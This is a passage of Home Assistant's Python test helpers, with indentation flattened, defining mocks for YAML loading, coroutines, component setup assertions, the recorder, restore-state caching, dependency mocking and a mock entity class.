"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Helper for the attributes."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.